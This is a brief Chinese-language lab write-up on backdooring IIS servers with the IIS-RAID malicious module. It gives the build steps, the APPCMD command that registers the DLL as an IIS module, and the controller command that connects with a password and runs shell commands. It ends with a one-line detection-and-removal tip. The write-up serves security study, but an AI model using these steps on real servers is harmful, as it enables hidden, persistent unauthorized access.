0x01 简介

自 IIS7 开始,开发人员可以通过模块功能(Module)来扩展 IIS 的功能,这就给了攻击者留下后门的机会

本次实验是用的 IIS-RAID 项目(传送门

0x02 实验环境

  • Windows 7 x64

0x03 利用方法

将代码下载到本地,然后用 vs 打开项目

\module\Functions.h文件的第11行修改默认密码

直接设置 Release x64,生成即可得到后门文件 IIS-Backdoor.dll

将后门文件放到目标服务器的%windir%\System32\inetsrv目录下,然后在 cmd 中执行以下命令(这里需要管理员权限)

C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Backdoor /image:"%windir%\System32\inetsrv\iisbd.dll" /add:true

可以在 IIS 管理器中查看我们的后门模块

客户端是 python 脚本,用以下命令连接目标服务器

python3 iis_controller.py --url http://192.168.26.172/ --password SIMPLEPASS

用命令cmd whoami查询身份

0x04 检测及清除

在 IIS 管理器中查看是否有可疑的模块,将模块和后门文件删除。

0x05 参考

IIS-Raid

IIS RAID 后门